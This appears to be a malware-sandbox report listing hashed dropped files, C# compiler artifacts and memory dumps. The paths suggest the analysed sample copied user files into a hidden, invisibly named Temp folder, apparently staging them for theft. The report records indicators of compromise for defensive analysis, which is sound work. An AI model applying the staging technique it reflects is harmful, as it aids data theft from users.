11e0fe6b6f636d188d6af48ff9731fa0cc1501cd0950f5aa45af1594fd3ff21300b7c3c683ff5f6d6888d55e201a6129fff5fd2c6b70e0e96663b3f354ae7179

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\CheckpointAdd.jpg

Filesize
327KB

MD5
3f08cc11b5918637e670ca4e43fe13f6

SHA1
e86736ad4fe121b8ef2e0357abb2f2e0cc57c8b1

SHA256
bd6f34393ff2c0baa0576fb9b1cf3c1df712f1950258cd6de87271f2d7aa2b0c

SHA512
e93a978151d8546b9eec9d74294a29170043759644279ce52fc295e372fdf1b45a2ee5693d5f88e6729289d2ecd13a9b186f7625470a5626b5076a22b4793d6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\CompleteRegister.pdf

Filesize
353KB

MD5
bcff53aa1e228232e7f400ac85604a21

SHA1
655a9762158c8259756b607890c7613c364208e3

SHA256
71b0c7b4ec708731d9a663b98aba6a7b6cd0b17e9f4d6424a6251b98acdd5bc5

SHA512
364b924ce09f3a1348766c755a657f2040fff8d25c0a9cfb9437901ff2e2296b022caa3256ac999385daa348ae74ec9304b2e2c07c2b064045563a055b08415a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\ConnectExpand.xlsx

Filesize
11KB

MD5
143a935ccbaf247696f8cd8286afe6fc

SHA1
35ad6544ad5cad2794dcb24b5281936a7af0a408

SHA256
caad930a7a975ebdfb9089a589e7816d2df0cf3d8fda79801468690a0209e2fe

SHA512
a97f1b370351de8853ac6f31fc3abf2114ae6639bec7934263a3bc70e5fcde3870faa1c994b586f9831a5144871238bb2e8fa6ea7ea4b165120fe02beeff2404

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\InstallEnter.xlsx

Filesize
12KB

MD5
159dcb1048f2bddd973f6cb15547179b

SHA1
6f973bf5bd61f7f259106ebf9b0604cc08262acc

SHA256
3552f4fb728a737c8c7d62bb1a11380b13d58b7bc9caf58f6dfba7cf501979dc

SHA512
987c56a70b10e177b358fb647064568591841266e3cea51efa7c3a8399e14251d978d5f710699983c3feada4caf049ea4eed5e585838c3eb6176992c61e28758

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\MeasureInstall.xlsx

Filesize
15KB

MD5
c4f7f41fd9d133f0b70210aebbebd3ae

SHA1
14b7897ffde8cb00f583e4303092a93cd0a3cbba

SHA256
41d7e24a9fa29bdc1799fcb6fc9bb13b385d6ec24ec4830b8925ba5b8ddf87c9

SHA512
758f7bd14319cb5d65166cdf03b6b6f55ef3ebd855778f7916d8412f3e4c17fdbc38c89b107afc3283012706923d1555aa154b4dea13e0ff7de435a12ac8446c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\OpenResize.txt

Filesize
930KB

MD5
85d3e149580f0b7850f054e8db69c0d4

SHA1
b8ac6a8580cbd5b3e7949acdd4cbbbf06dfd186a

SHA256
bb66ef92a6583356fca4f2408247a9f0f3dbf9d14875813607354860dfa91341

SHA512
8c6b4c88c2be0b956e7cb522cc46046ae52132d15c6804c38ecd38c005fcc65205341a67adeba86d2e1f246765039535c38256fec48f7926876ec43aa9fcb1eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\OutCopy.xlsx

Filesize
11KB

MD5
6b2abc5ca959c3076e01e8ba950011b3

SHA1
1e2cdc0c835f7f3fca618c97c0ed2dfcde192cdf

SHA256
f2c1c2d5f7f590522c4eded92fcc622db976fe1acbadf07b10a9f9af91cff386

SHA512
e57d2b142c27115beb6447ace9a2874c7787b36b2db6646df03f1f580966bd61ca0c58357a39572be24e13275fc41d63b0a032b7c59afb9f2f391e6deb46d14e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Desktop\ShowBackup.xlsm

Filesize
642KB

MD5
5ca5bddd40e0e2b8be05dc212d7c0e9a

SHA1
5934085f64557d4d4a8766d509315e54921303bc

SHA256
d0766a992ce2b4844d2e3da3bd00dd6df0f132d3ebaae6f59a4497407dc2a841

SHA512
ad7e5397f27fdd4ee926f9620c57867845e51991f07d4e1aefcaff1676726ed95ddf87a31cdac11b9c5c8314807c8230a93dc60c1915f9ec199690451d8a5337

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Documents\ReadMount.xlsx

Filesize
1.6MB

MD5
3dd8e52ce317302364093da57bd6f821

SHA1
3f37d640461233d853db2477d29edc74a74296f1

SHA256
05849635488fac4ab38570d563394f5204a2f1f072518293aad914f518ed9e54

SHA512
6b8d2d89e9bc023f18f78a044e62b34605620b6bbd17a8690de830816386bd0b0c386bf7cde248ed0e937b018627f9c295ff0a31a09fc6722d42e16288c3b65f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Downloads\BackupUnpublish.vdx

Filesize
367KB

MD5
0b201f46a256fc58dc474ec1c29b71d0

SHA1
25a48fd03c0a87cb8464cbe501eb02e33c44ea5c

SHA256
551ab448077fd4b3341c9f36ec0e019c1508b80182701c219bd1fb33adedf66f

SHA512
3afd8953797076b97dbb5f6b912078fb7ad6c4bc49b88341c1ae40b5ffabe999015f38fec538c7373b6d8e45a7cd3d3ac2db73376e1e59b7425c1fc94eb4560a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Downloads\CheckpointInstall.xlsx

Filesize
735KB

MD5
cea5d02c71eb2dd48bbc7212f3732be7

SHA1
091111b20972de17af3b798c88bf66b0cb3a734e

SHA256
8ea5a50ca0b699b3ef47d7e899d7cdc6b03bdefeae9c1227fae51b0f300733b1

SHA512
bad249927d8fa5529867bada47cf8e129b597f1a2c41265089382bdbc92046513064596c77f3918f3699e6847b213725961ca377dea873e603baf386ca41e337

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Downloads\FindBackup.001

Filesize
799KB

MD5
4161853491421303a82b1aae64216e34

SHA1
f9c5dc9a62e1c2eb6cc8338037616e264aeb5717

SHA256
7ebc54cc9b568178cf728c4aa37d3a4b8ba26925a48aee6fba68b0188e5df69b

SHA512
a7b78ef8c26d6c73bd848b671e9eee722640b3e3918f0e554d4d0f8511ba2f90b32cba36fd3896392057bfed3a600029625108f3a52780b6096b6605a7bb6606

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏‏‌ \Common Files\Music\CopyRename.csv

Filesize
234KB

MD5
95aa89b9cedaab8c4f8f01dba6450e5a

SHA1
7260678f71f2bfa7415cd1cd7405f3e4fb8083f1

SHA256
e205ce82928f715d5d0b29bd1c8ee8f98667095d774fa886f804338544b947a7

SHA512
418a11f386214772531533bd73d6556f44b62045d10c0fa97699b58144bd5d760bfa14deaf4c258cd0448b2f6f91365d5e2e0a29a2c8a4fdf22c300c109a59a4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc15oo02\CSC5D13CACAC3D4FFDAA56687B2140E91E.TMP

Filesize
652B

MD5
674ba3b1cb7b4596c4d7126f8c48231f

SHA1
514a2c0ab7f7cc30375cdea3de767cb05f57f35d

SHA256
a5cc6bb0a1fbb6adc5cc3ea789e2d9ab02f906dee9c05241523e7282220d8d0a

SHA512
967f75c22b9a01785534c2a0aacdadb875a517798d38281d5643b5b6558cca7b6d439fd15544762d998b31dac8984859473d41d1cdb0e3b6238741919591b0fc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc15oo02\kc15oo02.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kc15oo02\kc15oo02.cmdline

Filesize
607B

MD5
e0b7fbaafeb391eb777ef89efc55800b

SHA1
f62cf2a90d8c9116de7681e4ced4f8819c98c78a

SHA256
b97c3929c67ebb192238dee7bccd38b80bbba3df2e70b94578df97ccccf2f8fc

SHA512
df6d09adc235908c795249afe43b362926004afb9db4762c96de398f18aa5af7fe5574cb74d190e3e7aa786af8b02dcb8aa7816735f92e675ed1a453fafaf8e4

Download Submit
memory/1992-191-0x0000026526FF0000-0x0000026526FF8000-memory.dmp

Filesize
32KB

Download
memory/2064-54-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp

Filesize
180KB

Download
memory/2064-29-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp

Filesize
140KB

Download
memory/2064-119-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp

Filesize
100KB

Download
memory/2064-106-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp

Filesize
140KB

Download
memory/2064-71-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp

Filesize
736KB

Download
memory/2064-79-0x00007FFE9CDF0000-0x00007FFE9CDFD000-memory.dmp

Filesize
52KB

Download
memory/2064-72-0x000001D2AE030000-0x000001D2AE3A5000-memory.dmp

Filesize
3.5MB

Download
memory/2064-73-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp

Filesize
3.5MB

Download
memory/2064-81-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp

Filesize
100KB

Download
memory/2064-74-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp

Filesize
140KB

Download
memory/2064-240-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp

Filesize
52KB

Download
memory/2064-70-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp

Filesize
5.9MB

Download
memory/2064-251-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp

Filesize
184KB

Download
memory/2064-66-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp

Filesize
184KB

Download
memory/2064-64-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp

Filesize
52KB

Download
memory/2064-63-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp

Filesize
100KB

Download
memory/2064-60-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp

Filesize
1.4MB

Download
memory/2064-58-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp

Filesize
140KB

Download
memory/2064-56-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp

Filesize
100KB

Download
memory/2064-317-0x00007FFE9E270000-0x00007FFE9E284000-memory.dmp

Filesize
80KB

Download
memory/2064-263-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp

Filesize
736KB

Download
memory/2064-32-0x00007FFEA3810000-0x00007FFEA381F000-memory.dmp

Filesize
60KB

Download
memory/2064-264-0x000001D2AE030000-0x000001D2AE3A5000-memory.dmp

Filesize
3.5MB

Download
memory/2064-118-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp

Filesize
1.4MB

Download
memory/2064-25-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp

Filesize
5.9MB

Download
memory/2064-76-0x00007FFE9E270000-0x00007FFE9E284000-memory.dmp

Filesize
80KB

Download
memory/2064-78-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp

Filesize
180KB

Download
memory/2064-82-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp

Filesize
1.1MB

Download
memory/2064-271-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp

Filesize
3.5MB

Download
memory/2064-290-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp

Filesize
5.9MB

Download
memory/2064-304-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp

Filesize
1.1MB

Download
memory/2064-296-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp

Filesize
1.4MB

Download
memory/2064-291-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp

Filesize
140KB

Download
memory/2064-305-0x00007FFE99B00000-0x00007FFE9A0EA000-memory.dmp

Filesize
5.9MB

Download
memory/2064-319-0x00007FFE99270000-0x00007FFE9938C000-memory.dmp

Filesize
1.1MB

Download
memory/2064-330-0x00007FFE998D0000-0x00007FFE99988000-memory.dmp

Filesize
736KB

Download
memory/2064-329-0x00007FFE9CE00000-0x00007FFE9CE2E000-memory.dmp

Filesize
184KB

Download
memory/2064-328-0x00007FFE9F4A0000-0x00007FFE9F4B9000-memory.dmp

Filesize
100KB

Download
memory/2064-327-0x00007FFEA37D0000-0x00007FFEA37DD000-memory.dmp

Filesize
52KB

Download
memory/2064-326-0x00007FFE99990000-0x00007FFE99AFF000-memory.dmp

Filesize
1.4MB

Download
memory/2064-325-0x00007FFE9CE30000-0x00007FFE9CE53000-memory.dmp

Filesize
140KB

Download
memory/2064-324-0x00007FFE9F580000-0x00007FFE9F599000-memory.dmp

Filesize
100KB

Download
memory/2064-323-0x00007FFE9CE60000-0x00007FFE9CE8D000-memory.dmp

Filesize
180KB

Download
memory/2064-322-0x00007FFEA3810000-0x00007FFEA381F000-memory.dmp

Filesize
60KB

Download
memory/2064-321-0x00007FFEA3770000-0x00007FFEA3793000-memory.dmp

Filesize
140KB

Download
memory/2064-320-0x00007FFE99550000-0x00007FFE998C5000-memory.dmp

Filesize
3.5MB

Download
memory/2064-318-0x00007FFE9CDF0000-0x00007FFE9CDFD000-memory.dmp

Filesize
52KB

Download
memory/3488-83-0x0000027C80030000-0x0000027C80052000-memory.dmp

Filesize
136KB

Download